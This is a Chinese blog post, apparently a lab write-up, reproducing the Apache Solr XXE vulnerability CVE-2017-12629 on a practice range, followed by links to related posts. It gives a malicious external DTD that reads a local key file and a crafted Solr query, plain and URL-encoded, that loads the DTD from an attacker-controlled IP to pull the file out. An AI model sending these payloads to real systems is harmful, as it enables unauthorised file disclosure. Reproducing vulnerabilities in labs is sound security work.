CVE-2017-12629 xxe漏洞复现

最新推荐文章于 2024-05-28 16:45:00 发布
最新推荐文章于 2024-05-28 16:45:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: CVE 文章标签: cve 漏洞复现 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/115053234
版权

一、实验介绍

1.漏洞介绍

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。

2.影响版本

Apache Solr before 7.1 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this.
在这里插入图片描述

3.实验环境

东塔靶场

4.复现步骤

1.构造do.dtd放入vps中

构造do.dtd放入vps中

<!ENTITY % file SYSTEM "file:///tmp/key">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

在这里插入图片描述

使用编码命令

GET
/solr/demo/select?&q=<?xml+version="1.0"+?><!DOCTYPE+root[<!ENTITY+%+ext+SYSTEM+“http://ip/do.dtd”>%ext;%ent;]>&data;&wt=xml&defType=xmlparser

编码成

GET /solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f140.143.159.186%2fdo.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser

在requests头中使用 成功获取到key
在这里插入图片描述

幸运之河
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2017-12794 存储型xss漏洞
m0_63034363的博客
07-09 1041
CVE-2017-12794 存储型xss漏洞 主要是因为数据库报错将恶意代码爆出造成xss弹框
CVE-2017-12149的复现
看不尽的尘埃——博客
11-19 878
漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没...
CVE-2017-12629Apache Solr XXE&&RCE
qq_61553520的博客
05-13 917
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Apache Solr 远程命令执行漏洞CVE-2017-12629复现
HEAVEN569的博客
06-21 1297
Apache Solr 远程命令执行漏洞CVE-2017-12629复现
Vulhub漏洞靶场搭建
最新发布
weixin_51725318的博客
05-28 1836
Vulhub漏洞靶场搭建
solr XML外部实体注入(CVE-2017-12629-xxe)
hackzkaq的博客
12-22 146
一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629环境2、启动CVE-2017-12629环境3、查看CVE-2017-12629环境4、访问CVE-2017-12629环境5、查看CVE-2017-12629漏洞提示信息6、关闭CVE-2017-12629环境五、漏洞复现1、查看core2、Dnslog检测漏洞是否存在1.获取域名2.构造payload并执行3.漏洞存在3、读取/etc/passwd文件1.构造xml文件。
vulhub漏洞复现64_Solr
weixin_44193247的博客
02-12 694
vulhub漏洞复现练习篇
【vulhub】Apache Solr 远程命令执行漏洞CVE-2017-12629复现
qq_45300786的博客
09-15 1345
特征 访问8983端口即可查看到Apache solr的管理页面,无需登录。(可能换端口) 网站title是Solr Admin,图标有点像一朵红色的花 影响版本 Apache Solr 5.5.0到7.0.1版本 漏洞利用 此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 https://paper.seebug.org/425/ 这里我看了下vulhub官方的文档,首先创建一个listener
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Apache solr XXE 漏洞CVE-2017-12629
m0_73605862的博客
12-01 890
(排查了端口被占的问题,发现是可以打开目录的,是因为防火墙没关,后面关了就可以了)5.然后要用到另一个服务器上面的dtd文件,所以这里需要用http-server搭建一个服务器,先开放一个端口,然后在共享文件夹里面写入一个1.dtd。3.进入到核心的查看界面,是json的查看方式,第二张的表达方式会更直观,可以看到xxe漏洞在哪里,在那个demo那个地方。2.开始看wp的时候没有看懂为什么是core,然后去了解了一下solr的核心这个概念,然后发现是一个启动的配置。然后就出来了etc/passwd。
vulhub中Apache Solr 远程命令执行漏洞复现CVE-2017-12629
yougexiaojiuguan的博客
03-31 528
漏洞复现过程的记录
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4411
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
cve-2017-12629 apache solr xxe & rce 漏洞分析
whatday的专栏
06-26 2024
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Description Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查
漏洞分析」Drupal 远程代码执行「CVE-2017-6920」
蚁景网安学院
07-13 303
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析。漏洞描述环境搭建环境的搭建,我们可以选择 p神 的 Vulhub 上的环境,我们也可以利用 vulfocus 的在线环境,或...
Apache Solr 远程命令执行漏洞 CVE-2017-12629 漏洞复现
ADummy的博客
02-27 345
Apache Solr 远程命令执行漏洞CVE-2017-12629) by ADummy 0x00利用路线 ​ Burpsuite发送两个包,一个listener,一个update—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之
cve-2017-7504漏洞复现
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值